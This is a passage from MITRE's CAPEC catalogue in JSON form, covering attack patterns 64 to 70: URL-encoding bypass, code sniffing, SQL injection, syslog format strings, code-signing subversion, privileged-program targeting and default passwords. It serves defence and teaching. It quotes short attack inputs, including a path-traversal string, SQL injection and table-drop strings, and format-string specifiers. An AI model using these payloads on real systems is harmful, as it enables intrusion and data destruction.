Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Typical_Likelihood_of_Exploit"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Attack_Patterns, Taxonomy_Mappings"}],"Previous_Entry_Name":["Simple Script Injection",{"Date":"2017-05-01"}]}},"64":{"ID":"64","Name":"Using Slashes and URL Encoding Combined to Bypass Validation Logic","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets the encoding of the URL combined with the encoding of the slash characters. An attacker can take advantage of the multiple ways of encoding a URL and abuse the interpretation of the URL. A URL may contain special character that need special syntax handling in order to be interpreted. Special characters are represented using a percentage character followed by two digits representing the octet code of the original character (%HEX-CODE). For instance US-ASCII space character would be represented with %20. This is often referred as escaped ending or percent-encoding. Since the server decodes the URL from the requests, it may restrict the access to some URL paths by validating and filtering out the URL requests it received. An attacker will try to craft an URL with a sequence of special characters which once interpreted by the server will be equivalent to a forbidden URL. It can be difficult to protect against this attack since the URL can contain other format of encoding such as UTF-8 encoding, Unicode-encoding, etc.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"267"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The attacker accesses the server using a specific URL."},{"Step":"2","Phase":"Experiment","Description":"The attacker tries to encode some special characters in the URL. The attacker find out that some characters are not filtered properly."},{"Step":"3","Phase":"Exploit","Description":"The attacker crafts a malicious URL string request and sends it to the server."},{"Step":"4","Phase":"Exploit","Description":"The server decodes and interprets the URL string. Unfortunately since the input filtering is not done properly, the special characters have harmful consequences."}]},"Prerequisites":{"Prerequisite":["The application accepts and decodes URL string request.","The application performs insufficient filtering/canonicalization on the URLs."]},"Skills_Required":{"Skill":["An attacker can try special characters in the URL and bypass the URL validation.",{"Level":"Low"},"The attacker may write a script to defeat the input filtering mechanism.",{"Level":"Medium"}]},"Indicators":{"Indicator":["If the first decoding process has left some invalid or denylisted characters, that may be a sign that the request is malicious.","Traffic filtering with IDS (or proxy) can detect requests with suspicious URLs. IDS may use signature based identification to reveal such URL based attacks."]},"Consequences":{"Consequence":[{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Assume all input is malicious. Create an allowlist that defines all valid input to the software system based on the requirements specifications. Input that does not match against the allowlist should not be permitted to enter into the system. Test your decoding process against malicious input.","Be aware of the threat of alternative method of data encoding and obfuscation technique such as IP address encoding.","When client input is required from web-based forms, avoid using the \\"GET\\" method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the \\"POST method whenever possible.","Any security checks should occur after the data has been decoded and validated as correct data format. Do not repeat decoding process, if bad character are left after decoding process, treat the data as suspicious, and fail the validation process.","Refer to the RFCs to safely decode URL.","Regular expression can be used to match safe URL patterns. However, that may discard valid URL requests if the regular expression is too restrictive.","There are tools to scan HTTP requests to the server for valid URL such as URLScan from Microsoft (http://www.microsoft.com/technet/security/tools/urlscan.mspx)."]},"Example_Instances":{"Example":{"p":["Attack Example: Combined Encodings CesarFTP","Alexandre Cesari released a freeware FTP server for Windows that fails to provide proper filtering against multiple encoding. The FTP server, CesarFTP, included a Web server component that could be attacked with a combination of the triple-dot and URL encoding attacks.","An attacker could provide a URL that included a string like","This is an interesting exploit because it involves an aggregation of several tricks: the escape character, URL encoding, and the triple dot."],"div":["/...%5C/",{"style":"margin-left:10px;","class":"informative"}]}},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"177"},{"CWE_ID":"173"},{"CWE_ID":"172"},{"CWE_ID":"73"},{"CWE_ID":"22"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"697"},{"CWE_ID":"707"}]},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-495"},{"External_Reference_ID":"REF-496"},{"External_Reference_ID":"REF-497"},{"External_Reference_ID":"REF-498","Section":"URL Encoding Reference"},{"External_Reference_ID":"REF-499"},{"External_Reference_ID":"REF-500","Section":"5.11.4. Validating Hypertext Links (URIs/URLs)"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Obfuscation_Techniques, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Indicators, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"}]}},"65":{"ID":"65","Name":"Sniff Application Code","Abstraction":"Detailed","Status":"Draft","Description":"An adversary passively sniffs network communications and captures application code bound for an authorized client. Once obtained, they can use it as-is, or through reverse-engineering glean sensitive information or exploit the trust relationship between the client and server. Such code may belong to a dynamic update to the client, a patch being applied to a client component or any such interaction where the client is authorized to communicate with the server.","Likelihood_Of_Attack":"Low","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"157"},{"Nature":"CanPrecede","CAPEC_ID":"37"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Set up a sniffer] The adversary sets up a sniffer in the path between the server and the client and watches the traffic.","Technique":"The adversary sets up a sniffer in the path between the server and the client."},{"Step":"2","Phase":"Exploit","Description":"[Capturing Application Code Bound During Patching]adversary knows that the computer/OS/application can request new applications to install, or it periodically checks for an available update. The adversary loads the sniffer set up during Explore phase, and extracts the application code from subsequent communication. The adversary then proceeds to reverse engineer the captured code.","Technique":["adversary loads the sniffer to capture the application code bound during a dynamic update.","The adversary proceeds to reverse engineer the captured code."]}]},"Prerequisites":{"Prerequisite":["The attacker must have the ability to place themself in the communication path between the client and server.","The targeted application must receive some application code from the server; for example, dynamic updates, patches, applets or scripts.","The attacker must be able to employ a sniffer on the network without being detected."]},"Skills_Required":{"Skill":["The attacker needs to setup a sniffer for a sufficient period of time so as to capture meaningful quantities of code. The presence of the sniffer should not be detected on the network. Also if the attacker plans to employ an adversary-in-the-middle attack (CAPEC-94), the client or server must not realize this. Finally, the attacker needs to regenerate source code from binary code if the need be.",{"Level":"Medium"}]},"Resources_Required":{"Resource":{"p":["The Attacker needs the ability to capture communications between the client being updated and the server providing the update.","In the case that encryption obscures client/server communication the attacker will either need to lift key material from the client."]}},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Design: Encrypt all communication between the client and server.","Implementation: Use SSL, SSH, SCP.","Operation: Use \\"ifconfig/ipconfig\\" or other tools to detect the sniffer installed in the network."]},"Example_Instances":{"Example":["Attacker receives notification that the computer/OS/application has an available update, loads a network sniffing tool, and extracts update data from subsequent communication. The attacker then proceeds to reverse engineer the captured stream to gain sensitive information, such as encryption keys, validation algorithms, applications patches, etc..","Plain code, such as applets or JavaScript, is also part of the executing application. If such code is transmitted unprotected, the attacker can capture the code and possibly reverse engineer it to gain sensitive information, such as encryption keys, validation algorithms and such."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"319"},{"CWE_ID":"311"},{"CWE_ID":"318"},{"CWE_ID":"693"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Prerequisites"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses, Skills_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}],"Previous_Entry_Name":["Passively Sniff and Capture Application Code Bound for Authorized Client",{"Date":"2015-12-07"}]}},"66":{"ID":"66","Name":"SQL Injection","Abstraction":"Standard","Status":"Draft","Description":"This attack exploits target software that constructs SQL statements based on user input. An attacker crafts input strings so that when the target software constructs SQL statements based on the input, the resulting SQL statement performs actions other than those the application intended. SQL Injection results from failure of the application to appropriately validate input. When specially crafted user-controlled input consisting of SQL syntax is used without proper validation as part of SQL queries, it is possible to glean information from the database in ways not envisaged during application design. Depending upon the database and the design of the application, it may also be possible to leverage injection to have the database execute system-related commands of the attackers\' choice. SQL Injection enables an attacker to interact directly to the database, thus bypassing the application completely. Successful injection can cause information disclosure as well as ability to add or modify data in the database.","Likelihood_Of_Attack":"High","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"248"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Survey application] The attacker first takes an inventory of the functionality exposed by the application.","Technique":["Spider web sites for all available links","Sniff network communications with application using a utility such as WireShark."]},{"Step":"2","Phase":"Experiment","Description":"[Determine user-controllable input susceptible to injection] Determine the user-controllable input susceptible to injection. For each user-controllable input that the attacker suspects is vulnerable to SQL injection, attempt to inject characters that have special meaning in SQL (such as a single quote character, a double quote character, two hyphens, a parenthesis, etc.). The goal is to create a SQL query with an invalid syntax.","Technique":["Use web browser to inject input through text fields or through HTTP GET parameters.","Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.","Use network-level packet injection tools such as netcat to inject input","Use modified client (modified by reverse engineering) to inject input."]},{"Step":"3","Phase":"Experiment","Description":"[Experiment with SQL Injection vulnerabilities] After determining that a given input is vulnerable to SQL Injection, hypothesize what the underlying query looks like. Iteratively try to add logic to the query to extract information from the database, or to modify or delete information in the database.","Technique":["Use public resources such as \\"SQL Injection Cheat Sheet\\" at http://ferruh.mavituna.com/makale/sql-injection-cheatsheet/, and try different approaches for adding logic to SQL queries.","Add logic to query, and use detailed error messages from the server to debug the query. For example, if adding a single quote to a query causes an error message, try : \\"\' OR 1=1; --\\", or something else that would syntactically complete a hypothesized query. Iteratively refine the query.","Use \\"Blind SQL Injection\\" techniques to extract information about the database schema.","If a denial of service attack is the goal, try stacking queries. This does not work on all platforms (most notably, it does not work on Oracle or MySQL). Examples of inputs to try include: \\"\'; DROP TABLE SYSOBJECTS; --\\" and \\"\'); DROP TABLE SYSOBJECTS; --\\". These particular queries will likely not work because the SYSOBJECTS table is generally protected."]},{"Step":"4","Phase":"Exploit","Description":"[Exploit SQL Injection vulnerability] After refining and adding various logic to SQL queries, craft and execute the underlying SQL query that will be used to attack the target system. The goal is to reveal, modify, and/or delete database data, using the knowledge obtained in the previous step. This could entail crafting and executing multiple SQL queries if a denial of service attack is the intent.","Technique":"Craft and Execute underlying SQL query"}]},"Prerequisites":{"Prerequisite":["SQL queries used by the application to store, retrieve or modify data.","User-controllable input that is not properly validated by the application as part of SQL queries."]},"Skills_Required":{"Skill":["It is fairly simple for someone with basic SQL knowledge to perform SQL injection, in general. In certain instances, however, specific knowledge of the database employed may be required.",{"Level":"Low"}]},"Resources_Required":{"Resource":"None: No specialized resources are required to execute this type of attack."},"Indicators":{"Indicator":"Too many false or invalid queries to the database, especially those caused by malformed input."},"Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Data"},{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}]},"Mitigations":{"Mitigation":["Strong input validation - All user-controllable input must be validated and filtered for illegal characters as well as SQL content. Keywords such as UNION, SELECT or INSERT must be filtered in addition to characters such as a single-quote(\') or SQL-comments (--) based on the context in which they appear.","Use of parameterized queries or stored procedures - Parameterization causes the input to be restricted to certain domains, such as strings or integers, and any input outside such domains is considered invalid and the query fails. Note that SQL Injection is possible even in the presence of stored procedures if the eventual query is constructed dynamically.","Use of custom error pages - Attackers can glean information about the nature of queries from descriptive error messages. Input validation must be coupled with customized error pages that inform about an error without disclosing information about the database or application."]},"Example_Instances":{"Example":"With PHP-Nuke versions 7.9 and earlier, an attacker can successfully access and modify data, including sensitive contents such as usernames and password hashes, and compromise the application through SQL Injection. The protection mechanism against SQL Injection employs a denylist approach to input validation. However, because of an improper denylist, it is possible to inject content such as \\"foo\'/**/UNION\\" or \\"foo UNION/**/\\" to bypass validation and glean sensitive information from the database. See also: CVE-2006-5525"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"89"},{"CWE_ID":"1286"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"Taxonomy_Name":"WASC","Entry_ID":"19","Entry_Name":"SQL Injection"},{"Taxonomy_Name":"OWASP Attacks","Entry_Name":"SQL Injection"}]},"References":{"Reference":{"External_Reference_ID":"REF-607","Section":"Testing for SQL Injection"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Resources_Required"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-04-04","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Example_Instances, Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated References, Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Description"}]}},"67":{"ID":"67","Name":"String Format Overflow in syslog()","Abstraction":"Detailed","Status":"Draft","Description":"This attack targets applications and software that uses the syslog() function insecurely. If an application does not explicitely use a format string parameter in a call to syslog(), user input can be placed in the format string parameter leading to a format string injection attack. Adversaries can then inject malicious format string commands into the function call leading to a buffer overflow. There are many reported software vulnerabilities with the root cause being a misuse of the syslog() function.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"100"},{"Nature":"ChildOf","CAPEC_ID":"135"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target application] The adversary identifies a target application or program to perform the buffer overflow on. In this attack, adversaries look for applications that use syslog() incorrectly."},{"Step":"2","Phase":"Experiment","Description":"[Find injection vector] The adversary identifies an injection vector to deliver the excessive content to the targeted application\'s buffer. For each user-controllable input that the adversary suspects is vulnerable to format string injection, attempt to inject formatting characters such as %n, %s, etc.. The goal is to manipulate the string creation using these formatting characters.","Technique":"Inject probe payload which contains formatting characters (%s, %d, %n, etc.) through input parameters."},{"Step":"3","Phase":"Experiment","Description":"[Craft overflow content] The adversary crafts the content to be injected. If the intent is to simply cause the software to crash, the content need only consist of an excessive quantity of random data. If the intent is to leverage the overflow for execution of arbitrary code, the adversary will craft a set of content that not only overflows the targeted buffer but does so in such a way that the overwritten return address is replaced with one of the adversaries\' choosing which points to code injected by the adversary.","Technique":["The formatting characters %s and %d are useful for observing memory and trying to print memory addresses. If an adversary has access to the log being written to they can observer this output and use it to help craft their attack.","The formatting character %n is useful for adding extra data onto the buffer."]},{"Step":"4","Phase":"Exploit","Description":"[Overflow the buffer] Using the injection vector, the adversary supplies the program with the crafted format string injection, causing a buffer."}]},"Prerequisites":{"Prerequisite":"The Syslog function is used without specifying a format string argument, allowing user input to be placed direct into the function call as a format string."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":"Availability","Impact":"Unreliable Execution"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Integrity","Impact":"Modify Data"}]},"Mitigations":{"Mitigation":{"p":["The code should be reviewed for misuse of the Syslog function call. Manual or automated code review can be used. The reviewer needs to ensure that all format string functions are passed a static string which cannot be controlled by the user and that the proper number of arguments are always sent to that function as well. If at all possible, do not use the %n operator in format strings. The following code shows a correct usage of Syslog():","The following code shows a vulnerable usage of Syslog():"],"div":["syslog(LOG_ERR, \\"%s\\", cmdBuf);",{"style":"margin-left:10px;","class":"good"},"syslog(LOG_ERR, cmdBuf);",{"style":"margin-left:10px;","class":"bad","div":{"i":"// the buffer cmdBuff is taking user supplied data."}}]}},"Example_Instances":{"Example":"Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote attackers to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412"},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"120"},{"CWE_ID":"134"},{"CWE_ID":"74"},{"CWE_ID":"20"},{"CWE_ID":"680"},{"CWE_ID":"697"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"WASC","Entry_ID":"06","Entry_Name":"Format String"}},"References":{"Reference":[{"External_Reference_ID":"REF-1"},{"External_Reference_ID":"REF-503"},{"External_Reference_ID":"REF-504"},{"External_Reference_ID":"REF-505"},{"External_Reference_ID":"REF-506"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Prerequisites, Related_Attack_Patterns"}]}},"68":{"ID":"68","Name":"Subvert Code-signing Facilities","Abstraction":"Standard","Status":"Draft","Description":"Many languages use code signing facilities to vouch for code\'s identity and to thus tie code to its assigned privileges within an environment. Subverting this mechanism can be instrumental in an attacker escalating privilege. Any means of subverting the way that a virtual machine enforces code signing classifies for this style of attack.","Likelihood_Of_Attack":"Low","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"233"}},"Prerequisites":{"Prerequisite":["A framework-based language that supports code signing (such as, and most commonly, Java or .NET)","Deployed code that has been signed by its authoring vendor, or a partner.","The attacker will, for most circumstances, also need to be able to place code in the victim container. This does not necessarily mean that they will have to subvert host-level security, except when explicitly indicated."]},"Skills_Required":{"Skill":["Subverting code signing is not a trivial activity. Most code signing and verification schemes are based on use of cryptography and the attacker needs to have an understanding of these cryptographic operations in good detail. Additionally the attacker also needs to be aware of the way memory is assigned and accessed by the container since, often, the only way to subvert code signing would be to patch the code in memory. Finally, a knowledge of the platform specific mechanisms of signing and verifying code is a must.",{"Level":"High"}]},"Resources_Required":{"Resource":"The Attacker needs no special resources beyond the listed prerequisites in order to conduct this style of attack."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["A given code signing scheme may be fallible due to improper use of cryptography. Developers must never roll out their own cryptography, nor should existing primitives be modified or ignored.","If an attacker cannot attack the scheme directly, they might try to alter the environment that affects the signing and verification processes. A possible mitigation is to avoid reliance on flags or environment variables that are user-controllable."]},"Example_Instances":{"Example":["In old versions (prior to 3.0b4) of the Netscape web browser Attackers able to foist a malicious Applet into a client\'s browser could execute the \\"Magic Coat\\" attack. In this attack, the offending Applet would implement its own getSigners() method. This implementation would use the containing VM\'s APIs to acquire other Applet\'s signatures (by calling _their_ getSigners() method) and if any running Applet had privileged-enough signature, the malicious Applet would have inherited that privilege just be (metaphorically) donning the others\' coats.","Some (older) web browsers allowed scripting languages, such as JavaScript, to call signed Java code. In these circumstances, the browser\'s VM implementation would choose not to conduct stack inspection across language boundaries (from called signed Java to calling JavaScript) and would short-circuit \\"true\\" at the language boundary. Doing so meant that the VM would allow any (unprivileged) script to call privileged functions within signed code with impunity, causing them to fall prey to luring attacks.","The ability to load unsigned code into the kernel of earlier versions of Vista and bypass integrity checking is an example of such subversion. In the proof-of-concept, it is possible to bypass the signature-checking mechanism Vista uses to load device drivers."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"325"},{"CWE_ID":"328"},{"CWE_ID":"1326"}]},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Related_Weaknesses"}]}},"69":{"ID":"69","Name":"Target Programs with Elevated Privileges","Abstraction":"Standard","Status":"Draft","Description":"This attack targets programs running with elevated privileges. The adversary tries to leverage a vulnerability in the running program and get arbitrary code to execute with elevated privileges.","Likelihood_Of_Attack":"High","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"233","Exclude_Related":{"Exclude_ID":"515"}},{"Nature":"CanPrecede","CAPEC_ID":"8"},{"Nature":"CanPrecede","CAPEC_ID":"9"},{"Nature":"CanPrecede","CAPEC_ID":"10"},{"Nature":"CanPrecede","CAPEC_ID":"67"}]},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find programs with elevated priveleges] The adversary probes for programs running with elevated privileges.","Technique":"Look for programs that write to the system directories or registry keys (such as HKLM, which stores a number of critical Windows environment variables). These programs are typically running with elevated privileges and have usually not been designed with security in mind. Such programs are excellent exploit targets because they yield lots of power when they break."},{"Step":"2","Phase":"Explore","Description":"[Find vulnerability in running program] The adversary looks for a vulnerability in the running program that would allow for arbitrary code execution with the privilege of the running program.","Technique":["Look for improper input validation","Look for improper failure safety. For instance when a program fails it may authorize restricted access to anyone.","Look for a buffer overflow which may be exploited if an adversary can inject unvalidated data."]},{"Step":"3","Phase":"Exploit","Description":"[Execute arbitrary code] The adversary exploits the vulnerability that they have found. For instance, they can try to inject and execute arbitrary code or write to OS resources."}]},"Prerequisites":{"Prerequisite":["The targeted program runs with elevated OS privileges.","The targeted program accepts input data from the user or from another program.","The targeted program is giving away information about itself. Before performing such attack, an eventual attacker may need to gather information about the services running on the host target. The more the host target is verbose about the services that are running (version number of application, etc.) the more information can be gather by an attacker.","This attack often requires communicating with the host target services directly. For instance Telnet may be enough to communicate with the host target."]},"Skills_Required":{"Skill":["An attacker can use a tool to scan and automatically launch an attack against known issues. A tool can also repeat a sequence of instructions and try to brute force the service on the host target, an example of that would be the flooding technique.",{"Level":"Low"},"More advanced attack may require knowledge of the protocol spoken by the host service.",{"Level":"Medium"}]},"Indicators":{"Indicator":"The log can have a trace of abnormal activity. Also if abnormal activity is detected on the host target. For instance flooding should be seen as abnormal activity and the target host may decide to take appropriate action in order to mitigate the attack (data filtering or blocking). Resource exhaustion is also a sign of abnormal activity."},"Consequences":{"Consequence":[{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Commands","Note":"Run Arbitrary Code"},{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"},{"Scope":"Availability","Impact":"Resource Consumption","Note":"Denial of Service"}]},"Mitigations":{"Mitigation":["Apply the principle of least privilege.","Validate all untrusted data.","Apply the latest patches.","Scan your services and disable the ones which are not needed and are exposed unnecessarily. Exposing programs increases the attack surface. Only expose the services which are needed and have security mechanisms such as authentication built around them.","Avoid revealing information about your system (e.g., version of the program) to anonymous users.","Make sure that your program or service fail safely. What happen if the communication protocol is interrupted suddenly? What happen if a parameter is missing? Does your system have resistance and resilience to attack? Fail safely when a resource exhaustion occurs.","If possible use a sandbox model which limits the actions that programs can take. A sandbox restricts a program to a set of privileges and commands that make it difficult or impossible for the program to cause any damage.","Check your program for buffer overflow and format String vulnerabilities which can lead to execution of malicious code.","Monitor traffic and resource usage and pay attention if resource exhaustion occurs.","Protect your log file from unauthorized modification and log forging."]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"250"},{"CWE_ID":"15"}]},"References":{"Reference":{"External_Reference_ID":"REF-1"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attacker_Skills_or_Knowledge_Required, References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Execution_Flow, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Related_Weaknesses"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Description, Execution_Flow, Prerequisites"}]}},"70":{"ID":"70","Name":"Try Common or Default Usernames and Passwords","Abstraction":"Detailed","Status":"Draft","Description":"An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. \\"secret\\" or \\"password\\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.","Likelihood_Of_Attack":"Medium","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":[{"Nature":"ChildOf","CAPEC_ID":"49"},{"Nature":"CanPrecede","CAPEC_ID":"600"},{"Nature":"CanPrecede","CAPEC_ID":"151"},{"Nature":"CanPrecede","CAPEC_ID":"560"},{"Nature":"CanPrecede","CAPEC_ID":"561"},{"Nature":"CanPrecede","CAPEC_ID":"653"}]},"Prerequisites":{"Prerequisite":"The system uses one factor password based authentication.The adversary has the means to interact with the system."},"Skills_Required":{"Skill":["An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known.",{"Level":"Low"}]},"Resources_Required":{"Resource":"Technology or vendor specific list of default usernames and passwords."},"Indicators":{"Indicator":"Many incorrect login attempts are detected by the system."},"Consequences":{"Consequence":{"Scope":["Confidentiality","Access Control","Authorization"],"Impact":"Gain Privileges"}},"Mitigations":{"Mitigation":["Delete all default account credentials that may be put in by the product vendor.","Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.","Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.","Passwords 